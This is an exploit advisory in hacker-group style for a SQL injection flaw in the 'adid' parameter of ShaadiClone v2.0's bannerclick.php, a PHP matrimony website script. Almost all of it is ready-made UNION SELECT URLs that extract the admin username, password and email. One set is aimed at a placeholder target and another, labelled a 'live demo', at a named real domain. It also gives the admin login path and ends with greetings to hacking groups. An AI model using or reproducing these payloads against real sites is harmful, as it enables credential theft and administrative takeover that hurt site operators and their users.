|___________________________________________________| | | ShaadiClone v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script :http://www.zeescripts.com/main/php-script/shaadiclone-advanced-matrimony-website-software-php-script.html | |___________________________________________________| Exploit: ________ Admin Name : www.[target].com/Script/bannerclick.php?adid=-1+union+select+1,2,LoginID,4,5,6,7,8,9+FROM+admin-- Admin Password : www.[target].com/Script/bannerclick.php?adid=-1+union+select+1,2,Password,4,5,6,7,8,9+FROM+admin-- Admin Email : www.[target].com/Script/bannerclick.php?adid=-1+union+select+1,2,AdminEmail,4,5,6,7,8,9+FROM+admin-- L!VE DEMO: _________ Admin Name : http://www.shaadiclone.com/bannerclick.php?adid=-1+union+select+1,2,LoginID,4,5,6,7,8,9+FROM+admin-- Admin Password : http://www.shaadiclone.com/bannerclick.php?adid=-1+union+select+1,2,Password,4,5,6,7,8,9+FROM+admin-- Admin Email : http://www.shaadiclone.com/bannerclick.php?adid=-1+union+select+1,2,AdminEmail,4,5,6,7,8,9+FROM+admin-- ___________________ Admin LogiN : www.[target].com/Script/admin/ ____________________________( Greetz )____________________________ | | tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | | | jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke |_________________________________________________________________ Im IRAQi